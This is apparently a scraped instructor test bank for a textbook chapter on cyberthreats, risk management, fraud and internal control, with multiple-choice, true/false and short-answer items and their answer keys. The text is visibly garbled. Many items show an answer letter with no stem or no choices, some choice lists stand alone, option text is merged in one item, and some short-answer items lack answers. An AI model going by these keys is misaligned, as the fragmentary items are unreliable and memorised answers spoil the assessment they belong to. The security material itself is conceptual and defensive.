Professional Documents
Culture Documents
Information Technology For Management Digital Strategies For Insight Action and Sustainable Performance 10th Edition Turban Test Bank 1
Information Technology For Management Digital Strategies For Insight Action and Sustainable Performance 10th Edition Turban Test Bank 1
Test Bank
Multiple Choice
1. The discount retailer Target suffered a hacker attack during the fourth quarter of 2013
(4Q2013) that exposed customer account information. Which of the following was not an
impact of Target’s hacker attack and data breach?
a. 4Q 2013 profit dropped 46% and sales revenue fell 5.3 % after breach was
disclosed.
b. Gartner estimated the cost of the breach from $400 million to $450 million
c. Target faced 2 lawsuits—one related to privacy invasion and one for negligence.
1
d. The incident scared shoppers away, affecting the company’s profits throughout
2014.
Answer: C
Difficulty: Hard
Section Ref: Opening Case 5.1AACSB: Dynamics of the global economy
2. Almost half of the 2013 breaches occurred in ________, where the largest number of records
was exposed—more than 540 million data records or 66 percent.
a. Asia
b. China
c. Europe
d. The United States
Answer: D
Difficulty: Easy
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
2
3. Negative consequences of lax cybersecurity that companies tend to face include all of the
following except ________.
Answer: B
Difficulty: Easy
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
4. The main cause of data breaches is ________, which is so successful because of ________
when management does not do enough to defend against cyberthreats.
Answer: B
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
Answer: A
Difficulty: Easy
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
3
6. A(n) ________ attack bombards a network or website with traffic to crash it and leave it
vulnerable to other threats.
Answer: B
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
7. Attacks ________ could significantly disrupt the functioning of government and business—
and trigger cascading effects far beyond the targeted sector and physical location of the
incident.
a. By hacktivists
b. By hackers
c. On critical infrastructure
d. On industrial control systems
Answer: C
Difficulty: Hard
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
8. Which of the following represents a cybersecurity concern about employees using their own
smartphones for work purposes?
a. Employees will spend too much time playing games or using entertainment and
recreation apps, thus reducing productivity.
b. Managers will be unable to monitor the time spent on personal calls made during
work hours.
c. Many personal smartphones do not have anti-malware or data encryption apps,
creating a security problem with respect to any confidential business data stored
on the device.
d. Consumer-quality equipment are more likely to break or malfunction than
enterprise quality devices.
Answer: C
Difficulty: Medium
4
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
9. ________ is also known as human hacking—tricking users into revealing their credentials
and then using them to gain access to networks or accounts.
a. Android-hacking
b. BYOD
c. Hacktivism
d. Social engineering
Answer: D
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
10. Experts believe the three greatest cybersecurity dangers over the next few years will involve
all of the following except __________.
a. persistent threats
b. POS attacks
c. mobile computing
d. the use of social media
Answer: B
Difficulty: Hard
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
11. ____________ is/are defined as “systems and assets, whether physical or virtual, so vital to
the United States that the incapacity or destruction of such systems and assets would have a
debilitating impact on security, national economic security, national public health or safety,
or any combination of those matters.”
a. Critical infrastructure
b. Cyber architecture
c. National networks
d. Strategic assets
Answer: A
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
5
12. ___________ tactics are used by hackers and corporate spies to trick people into revealing
login information or access codes.
a. Social engineering
b. Backdoor
c. BYOD
d. Password cracking
Answer: A
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
13. A stealth network attack in which an unauthorized person gains access to a network and
remains undetected for a long time is referred to as a(n) __________ attack.
a. registry denial
b. advanced persistent threat
c. DDOS
d. hacktivist
Answer: B
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
14. Cybercrime surveys have reported each of the following trends or findings except ________.
Answer: D
Difficulty: Hard
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Reflective thinking
6
15. A key of finding of the 2014 Global State of Information Security Survey was ________.
a. Too many companies are defending yesterday---that is, they rely on yesterday’s
cybersecurity practices that are ineffective at combating today’s threats.
b. Protecting all data at an equally high level is now practical and feasible.
c. Most companies implement stringent security policies before moving to cloud
computing, but not before implementing BYOD.
d. APTs require a new information-protection model that focuses on preventing
DDoS attacks.
Answer: A
Difficulty: Hard
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
Answer: B
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
17. According to cybersecurity experts, most data breaches go unreported because corporate
victims fear that disclosure would damage their stock price, or because ________.
Answer: B
Difficulty: Hard
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
7
18. One source of cybersecurity threats today are ____________who breach networks in an
attempt to gain media attention or for their cause.
a. Hacktivists
b. Political criminals
c. Industrial spies
d. Social engineers
Answer: A
Difficulty: Easy
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
19. A(n) ________ is a hacker who quietly attempts to breach secure networks looking for trade
secrets or proprietary information.
a. Hacktivist
b. Political criminal
c. profit-motivated cybercriminalIndustrial spy
d. Identity thief
Answer: C
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Reflective thinking
20. One of ________ specialties is finding websites with poor security, and then stealing and
posting information from them online.
a. LulzSec’s.
b. .RSA’s
c. Fraudsters’
d. Botmasters’
Answer: A
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
21. LulzSec and Anonymous are examples of ________ that have claimed responsibility for high
profile attacks designed to make a political statement, embarrass an organization or
government, or to gain publicity.
8
a. Hacktivists
b. Hostile government agents
c. Industrial spies
d. Cyber terrorists
Answer: A
Difficulty: Easy
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
22. The preferred method of hackers who want to steal trade secrets and other confidential
information from business organizations is ___________.
Answer: C
Difficulty: Hard
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
23. U.S. cybersecurity experts and government officials are increasingly concerned about
breaches from __________ into corporate networks, either through mobile devices or by
other means.
a. Domestic terrorists
b. Amateur hackers
c. Organized crime syndicates based in the United States
d. Other countries
Answer: D
Difficulty: Hard
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
24. Government and corporate officials concerned about security threats do not bring their own
cell phones or laptops when traveling overseas. Instead, they bring loaner devices and follow
9
strict security procedures including not connecting to their domestic network while out of the
country. These procedures are referred to as _________.
Answer: B
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
25. The objectives of cybersecurity are to accomplish each of the following except _________.
a. Make data and documents available and accessible 24/7 while simultaneously
restricting access.
b. Promote secure and legal sharing of information among authorized persons and
partners.
c. Ensure compliance with supply chain business partners.
d. Detect, diagnose, and respond to incidents and attacks in real time.
Answer: C
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
Answer: B
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
10
c. Estimated cost, loss, or damage that can result from an exploit.
d. Tools or techniques that take compromise a network.
Answer: A
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
Answer: D
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
Answer: D
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
30. Chris is a network manager for a large company. She receives daily updates about various
malware and then assesses how to best protect her organization’s network from attack. In
cybersecurity terminology, she is involved in __________.
a. Identifying exposure
b. Risk management
c. A security audit
d. Encryption defenses
Answer: B
Difficulty: Medium
11
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
Answer: B
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
32. When sending sensitive email, James uses a program that transforms data into unreadable
text to protect it from being understood by unauthorized users. James is using ________ to
protect his email communications.
a. Authentication
b. Defense-in-depth
c. Encryption
d. Hashing
Answer: C
Difficulty: Easy
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
33. Access to top secret or highly secure networks associated with Homeland Security or
national defense use authentication methods based on a biological feature, such as a
fingerprint or retinal scan to identify a person. These methods are called _____________.
a. Bio-Engineering
b. Physical security
c. Biometrics
d. Human factors
Answer: C
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
12
34. Most organizations use software or hardware devices to control access to their private
networks from the Internet by analyzing incoming and outgoing data packets. These devices
are called ___________.
a. Antimalware
b. Firewalls
c. Intrusion detection systems
d. Middleware
Answer: B
Difficulty: Easy
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
35. The ability of an IS to continue to operate when a failure occurs, but usually for a limited
time or at a reduced level is referred to as __________.
a. Fault tolerance
b. Hot site ready
c. Cold site ready
d. System override
Answer: A
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
36. IT professionals work hard to protect key characteristics of an asset from security breaches.
One of these characteristics is ________, or the avoidance of unauthorized disclosure of
information or data.
a. Integrity
b. Confidentiality
c. Availability
d. Reliability
Answer: B
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
13
37. IT professionals work hard to protect key characteristics of an asset from security breaches.
One of these characteristics is ____________, or the property that data or files have not been
altered in an unauthorized way.
a. Integrity
b. Confidentiality
c. Availability
d. Reliability
Answer: A
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
38. IT professionals work hard to protect key characteristics of an asset from security breaches.
One of these characteristics is _________, or the property that data is accessible and
modifiable when needed by those authorized to do so.
a. Integrity
b. Confidentiality
c. Availability
d. Reliability
Answer: C
Difficulty: Easy
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
a. Record
b. Authenticate
c. Substantiate
d. Validate
Answer: B
Difficulty: Easy
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
14
40. Intrusion Detection Systems (IDS) are designed to monitor network traffic and identify
threats that have breached the networks’ initial defenses. IDS identify all of the following
except:
a. An attacker who is trying to break into the credentials of a legitimate user in order
to gain access to an IS, device, or network.
b. A legitimate user who performs actions he is not authorized to do.
c. A user who tries to disguise or cover up his actions by deleting audit files or
system logs.
d. Employees who use computing or network resources inefficiently.
Answer: D
Difficulty: Easy
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
41. While security threats from e-mail viruses and malware have been declining for years as e-
mail security has improved, threats from __________ have increased considerably in recent
years.
a. Software errors
b. Malicious employees
c. Social networks and cloud computing
d. Vendor sabotage
Answer: C
Difficulty: Easy
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
42. Facebook, YouTube, Twitter, LinkedIn, and other social networks are making IT security
dangers worse. Why?
a. Users invite in and build relationships with others. Cybercriminals hack into these
trusted relationships using stolen log-in credentials.
b. E-mail viruses and malware have been increasing for years even though e-mail
security has improved.
c. Communication has shifted from social networks to smartphones.
d. Web filtering, user education, and strict policies cannot help prevent IT security
dangers on Facebook and other social networks.
Answer: A
Difficulty: Hard
Section Ref: 5. 3 Mobile, App, and Cloud Security
15
AACSB: Reflective thinking
43. When new vulnerabilities are found in operating systems, applications, or wired and wireless
networks, vendors of those products release __________ or __________ to fix the
vulnerabilities.
Answer: A
Difficulty: Medium
Section Ref: 5. 3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
44. Which of the following is not a characteristic of money laundering and terrorist financing?
Answer: C
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Reflective thinking skills
45. Samuel received an email that looked like it came from his bank. The email told him to click
a link that opened an official looking Webpage where he was asked to enter his account
information. But when Samuel examined the URL, he noticed it was a strange address he did
not recognize. Most likely, someone was attempting to steal Samuel’s confidential
information using a technique called __________.
a. Botnets
b. Phishing
c. Spoofing
d. Click hijacking
Answer: B
16
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
46. In the United States, the Sarbanes–Oxley Act (SOX), Gramm-Leach-Bliley Act (GLB),
Federal Information Security Management Act (FISMA), and USA Patriot Act all require
businesses to __________________________.
Answer: C
Difficulty: Hard
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
47. The director of the Federal Trade Commission (FTC) bureau of consumer protection warned
that the agency would bring enforcement action against small businesses that ________
Answer: D
Difficulty: Hard
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
48. The principle of ________ acknowledges that the cost of information security needs to be
balanced with its benefits. It is the basic cost–benefit principle with which you are familiar.
a. accounting
b. economic use of resources
c. legality
d. COBIT
Answer: B
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
17
49. ________ is the supervision, monitoring, and control of an organization’s IT assets.
a. IT governance
b. Internal control
c. PCI DSS
d. FISMA
Answer: A
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
50. The purpose of the ________ is to improve customers’ trust in e-commerce, especially when
it comes to online payments, and to increase the Web security of online merchants.
a. IT governance
b. Internal control
c. PCI DSS
d. FISMA
Answer: C
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
Answer: A
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
18
b. IT security procedures and enforcement
c. Hardware and software selection
d. Acceptable use policies and IT security training
Answer: C
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
Answer: A
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
Answer: B
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
a. Data tampering
b. Worms
c. Phishing
d. Vectors
19
Answer: C
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
56. Storm worm, which is spread via spam, is a ________ agent embedded inside over 25
million computers. Storm’s combined power has been compared to the processing power of
________.
a. botnet; a supercomputer
b. spyware; a DDoS attack
c. vector; zombies
d. spear phishing; a server
Answer: A
Difficulty: Hard
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
57. Sometimes system failures and data or information loss can result from reasons other than an
intentional attempt to breach security. Unintentional threats are all of the following except
___________.
a. Political/civic unrest
b. Human errors
c. Environmental hazards
d. Computer systems failures
Answer: A
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
58. __________ is the elapsed time between when vulnerability is discovered and when it is
exploited and has shrunk from months to __________.
a. Time-to-exploitation; days
b. Time-to-exploitation; minutes
c. Denial of service; days
d. Denial of service; seconds
Answer: B
Difficulty: Hard
20
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
Answer: D
Difficulty: Hard
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
60. The Payment Card Industry Data Security Standard (PCI DSS) created by Visa, MasterCard,
American Express, and Discover is a __________.
a. Set of standards required by U.S. and international law for protecting credit card
transaction data.
b. Set of industry standards required for all online merchants that store, process, or
transmit cardholder data.
c. Set of voluntary security guidelines for retailers who accept Visa, MasterCard,
American Express, and Discover credit cards.
d. Set of regulations (that vary from state to state, and country to country) that apply
to credit card companies.
Answer: B
Difficulty: Hard
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
61. Social networks and cloud computing have increased vulnerabilities in all of the following
ways except ________.
a. by providing a single point of failure and attack for organized criminal networks
b. In Twitter and Facebook, users invite in and build relationships with others.
Cybercriminals hack into these trusted relationships using stolen logins.
c. Twitter’s use of service packs and patches have not been effective.
d. These networks and services increase exposure to risk because of the time-to-
exploitation of today’s sophisticated spyware and mobile viruses
Answer: C
Difficulty: Medium
21
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
62. Business operations are controlled by apps, systems, and networks that are so interconnected
that anyone’s ________ is an entry point for attacks.
a. mobile device
b. botnet
c. BYOD
d. firewall
Answer: A
Difficulty: Medium
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
63. Voice and fingerprint _______ can significantly improve the security of physical devices and
provide stronger authentication for remote access or cloud services.
a. cryptography
b. biometrics
c. encryption
d. visualization
Answer: B
Difficulty: Medium
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
64. Crime can be divided into two categories depending on the tactics used to carry out the
crime: ________.
Answer: D
Difficulty: Medium
Section Ref: 5.4 Defending Against Fraud
AACSB: Use of Information Technology
22
65. __________ are essential to the prevention and detection of occupation frauds
Answer: B
Difficulty: Medium
Section Ref: 5.4 Defending Against Fraud
AACSB: Use of Information Technology
66. The single-most effective fraud prevention tactic is making employees know that ________.
Answer: D
Difficulty: Medium
Section Ref: 5.4 Defending Against Fraud
AACSB: Ethical understanding and reasoning abilities
23
67. When it comes to fraud committed by an organization’s employees, the single most effective
fraud prevention technique is _______.
Answer: C
Difficulty: Hard
Section Ref: 5.4 Defending Against Fraud
AACSB: Ethical understanding and reasoning abilities
a. Detection
b. Lawsuits
c. Prevention
d. Prosecution
Answer: C
Difficulty: Medium
Section Ref: 5.4 Defending Against Fraud
AACSB: Ethical understanding and reasoning abilities
a. Managerial corruption
b. Insider or internal fraud
c. Corporate fraud
d. Intentional fraud
Answer: B
Difficulty: Medium
Section Ref: 5.4 Defending Against Fraud
AACSB: Ethical understanding and reasoning abilities
24
70. When it comes to defending against employee fraud, regulators look favorably on companies
that can demonstrate good __________ and best practices in operational risk management.
a. Corporate governance
b. Access to legal counsel
c. Relationships with security vendors
d. Awareness of industry standards
Answer: A
Difficulty: Hard
Section Ref: 5.4 Defending Against Fraud
AACSB: Ethical understanding and reasoning abilities
71. Detecting internal fraud has become sophisticated. Audit trails from key systems and
personnel records are stored in data warehouses and subjected to __________ where things
like excessive hours worked, unusual transactions, copying of huge amounts of data and
other unusual patterns of behavior are identified.
a. Security audits
b. Pattern analysis
c. Behavior recognition scans
d. Anomaly detection analysis
Answer: D
Difficulty: Hard
Section Ref: 5.4 Defending Against Fraud
AACSB: Use of Information Technology
72. People who have their social security or credit card numbers stolen and used by thieves are
frequently victims of ___________________.
a. Insider fraud
b. Identity theft
c. Occupational corruption
d. Document sabotage
Answer: B
Difficulty: Hard
Section Ref: 5.4 Defending Against Fraud
AACSB: Use of Information Technology
25
73. Internal fraud prevention and detection measures are based on __________ and __________.
Answer: B
Difficulty: Hard
Section Ref: 5.4 Defending Against Fraud
AACSB: Use of Information Technology
74. The _________ is an exercise that determines the impact of losing the support or availability
of a resource.
Answer: A
Difficulty: Medium
Section Ref: 5.5: Compliance and Internal Control
AACSB: Use of Information Technology
75. The cybersecurity defense strategy and controls that should be used depend on __________.
Answer: C
Difficulty: Medium
Section Ref: 5.5: Compliance and Internal Control
AACSB: Use of Information Technology
26
76. A defense strategy requires several controls. _________are established to protect the system
regardless of the specific application.
a. Application controls
b. Physical controls
c. General controls
d. Authentication controls
Answer: C
Difficulty: Medium
Section Ref: 5.5: Compliance and Internal Control
AACSB: Use of Information Technology
77. A defense strategy requires several controls. ___________ protect computer facilities and
resources such as computers, data centers, software, manuals, and networks.
a. Application controls
b. Physical controls
c. General controls
d. Authentication controls
Answer: B
Difficulty: Medium
Section Ref: 5.5 Compliance and Internal Control
AACSB: Use of Information Technology
78. Physical security includes several controls. Which of the following is not a type of physical
control?
Answer: A
Difficulty: Medium
Section Ref: 5.5: Compliance and Internal Control
AACSB: Use of Information Technology
27
79. Which of the following is not a type of administrative control for information assurance and
risk management?
Answer: D
Difficulty: Medium
Section Ref: 5.5: Compliance and Internal Control
AACSB: Use of Information Technology
80. The internal control environment is the work atmosphere that a company sets for its
employees and is designed to achieve all of the following except _________.
Answer: B
Difficulty: Hard
Section Ref: 5.5: Compliance and Internal Control
AACSB: Use of Information Technology
a. Is an antifraud law
b. Forces more accurate business reporting and disclosure of GAAP (generally
accepted accounting principles) violations.
c. Makes it necessary to find and root out fraud.
d. Has been adopted by all countries in North American and the European Union
Answer: D
Difficulty: Medium
Section Ref: 5.5: Compliance and Internal Control
AACSB:
28
82. An audit is an important part of any control system. Which of the following is not a question
that would typically be asked as part of an information systems audit?
a. Are there sufficient controls in the system? Which areas are not covered by
controls?
b. Are the controls effective and implemented properly?
c. What is the ROI associated with system controls?
d. Are there procedures to ensure reporting and corrective actions in case of
violations of controls?
Answer: C
Difficulty: Hard
Section Ref: 5.5 Compliance and Internal Control
AACSB: Use of Information Technology
29
True/False
Answer: True
Difficulty: Easy
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Dynamics of the global economy
2. The main cause of a data breach is malware, but the reason hacking is so successful is
negligence—management not doing enough to defend against cyberthreats.
Answer: False
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Reflective thinking
Answer: False
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
Answer: True
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
5. Cyber-security experts warn that battling distributed denial-of-service and malware attacks
has become part of everyday business for all organizations.
Answer: True
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
30
6. Managers should expect less tolerant regulators and greater fines and negative consequences
for data breaches, according to KPMG.
Answer: True
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
7. Powerful IT security systems are needed to defend against what appears to be authorized
access to a network or application.
Answer: False
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
8. It is often easy to get users to infect their corporate network or mobiles by tricking them into
downloading and installing malicious apps or backdoors.
Answer: True
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
9. When an employee’s device is lost, the company can suffer a data breach if the device is not
encrypted.
Answer: True
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Dynamics of the global economy
10. Since protecting all data at an equally high level is not practical, cybersecurity strategies need
to classify and prioritize defenses.
Answer: True
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Dynamics of the global economy
31
11. Botnets are stealth network attacks in which an unauthorized person gains access to a
network and remains undetected for a long time to steal data continuously.
Answer: False
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
12. Most data breaches go unreported, according to cybersecurity experts, because corporate
victims fear that disclosure would damage their stock price, or because they never knew they
were hacked in the first place
Answer: True
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
13. The smart strategy is to invest more to protect the company’s most valuable assets rather than
try to protect all assets equally.
Answer: True
Difficulty: Easy
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
14. Exploits are gaps, holes, weaknesses, or flaws in corporate networks, IT security defenses,
user training, policy enforcement, data storage, software, operating systems, apps, or mobile
devices that expose an organization to intrusions or other attacks.
Answer: False
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
15. Vulnerabilities exist in networks, OSs, apps, databases, mobile devices, and cloud
environments. These vulnerabilities are attack vectors for malware, hackers, hactivists, and
organized crime.
Answer: True
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
32
16. Risk is the probability of a threat successfully exploiting a vulnerability and the estimated
cost of the loss or damage.
Answer: True
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
17. Hacking is an industry with its own way of operating, a workforce, and support services,
such as contract hackers.
Answer: True
Difficulty: Easy
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
18. Firewalls and intrusion detection systems (IDS) mostly protect against internal threats.
Answer: False
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
Answer: True
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
20. Online gambling offers easy fronts for international money-laundering operations.
Answer: True
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
21. Hardware and software security defenses are important because they protect against
irresponsible business practices.
33
Answer: False
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
22. One of the biggest mistakes managers make is underestimating IT vulnerabilities and threats.
Answer: True
Difficulty: Easy
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
23. Most viruses, trojans, and worms are activated when an attachment is opened or a link is
clicked.
Answer: True
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
24. When a host computer is infected, attempts to remove the malware may fail—and the
malware may reinfect the host during a restore if the malware is captured in backups or
archives.
Answer: True
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
25. Botnets often target select groups of people with something in common—they work at the
same company, bank at the same financial institution, or attend the same university
Answer: False
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
26. Social networks and cloud computing increase vulnerabilities by providing a single point of
failure and attack for organized criminal networks.
34
Answer: True
Difficulty: Medium
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
27. Enterprises take risks with BYOD practices that they never would consider taking with
conventional computing devices.
Answer: True
Difficulty: Medium
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
28. According to a Mobile Phone report, 17 rogue apps managed to get into Google Play and
they were downloaded over 700,000 times before being removed. Rogue mobile apps can
contain malware or launch phishing attacks.
Answer: True
Difficulty: Medium
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
29. Fraudsters carry out their crime by threatening others and by taking advantage of their fears
of job loss or disciplinary action.
Answer: False
Difficulty: Medium
Section Ref: 5.4 Defending Against Fraud
AACSB: Use of Information Technology
30. During the fraud investigation of Bernie Madoff, computer forensics experts were tasked
with uncovering digital messages that revealed “who knew what” and “who did what.”
Answer: True
Difficulty: Medium
Section Ref: 5.4 Defending Against Fraud
AACSB: Use of Information Technology
31. Internal fraud prevention measures are based on the same controls used to prevent external
intrusions—perimeter defense technologies, such as firewalls, e-mail scanners, and biometric
access.
35
Answer: True
Difficulty: Medium
Section Ref: 5.4 Defending Against Fraud
AACSB: Use of Information Technology
32. SOX and the SEC regulators are making it clear that if controls can be ignored, there is no
control. Therefore, fraud prevention and detection require an effective monitoring system.
Answer: True
Difficulty: Medium
Section Ref: 5.5 Compliance and Internal Control
AACSB: Use of Information Technology
33. Approximately 25 percent of occupational fraud could have been prevented if proper IT-
based internal controls had been designed, implemented, and followed
Answer: False
Difficulty: Medium
Section Ref: 5.5 Compliance and Internal Control
AACSB: Use of Information Technology
34. Detection and damage containment are the most desirable fraud controls.
Answer: False
Difficulty: Medium
Section Ref: 5.5 Compliance and Internal Control
AACSB: Use of Information Technology
35. A biometric control is an automated method of verifying the identity of a person, based on
physical or behavioral characteristics.
Answer: True
Difficulty: Medium
Section Ref: 5.5 Compliance and Internal Control
AACSB: Use of Information Technology
36. A business impact analysis estimates the consequences of disruption of a business function
and collects data to develop recovery strategies.
Answer: True
36
Difficulty: Medium
Section Ref: 5.5 Compliance and Internal Control
AACSB: Use of Information Technology
37
Short Answer
1. The practice of people bringing and using their own mobile devices for work purposes is
called _________.
2. ____________ tactics are used by hackers and corporate spies to trick people into revealing
login information or access codes.
3. A stealth network attack in which an unauthorized person gains access to a network and
remains undetected for a long time is referred to as a(n) ___________ attack.
4. One source of cybersecurity threats today are _____________, who hack for their own
causes and attempt to gain media attention.
Answer: Hacktivists
Difficulty: Easy
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
38
6. In Cybersecurity terminology, a(n) __________is defined as something or someone that may
result in harm to an asset.
Answer: threat
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
Answer: vulnerability
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
Answer: Risk
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
Answer: Exposure
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
10. In Cybersecurity terminology, a(n) __________ is defined as a tool or technique that takes
advantage of a vulnerability.
Answer: Exploit
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
39
11. When sending sensitive email, James uses a program that transforms data into scrambled
code to protect it from being understood by unauthorized users. James is using ___________
to protect his email communications.
Answer: Encryption
Difficulty: Easy
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
12. In the United States, the Sarbanes–Oxley Act (SOX), Gramm-Leach-Bliley Act (GLB),
Federal Information Security Management Act (FISMA), and USA Patriot Act all require
businesses to protect PII, which stands for _______________.
13. Access to top secret or highly secure networks associated with Homeland Security or
national defense often use authentication methods based on a biological feature, such as a
fingerprint or retina to identify a person. These methods are called ____________.
Answer: biometrics
Difficulty: Medium
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
14. _______ are software programs that users download and install to fix a vulnerability.
Answer: Patches
Difficulty: Easy
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
15. ______________ are designed to monitor network traffic and identify threats that may have
breached the networks initial defenses.
40
AACSB: Use of Information Technology
16. _____________ is the elapsed time between when vulnerability in a software app or system
is discovered and when it’s exploited.
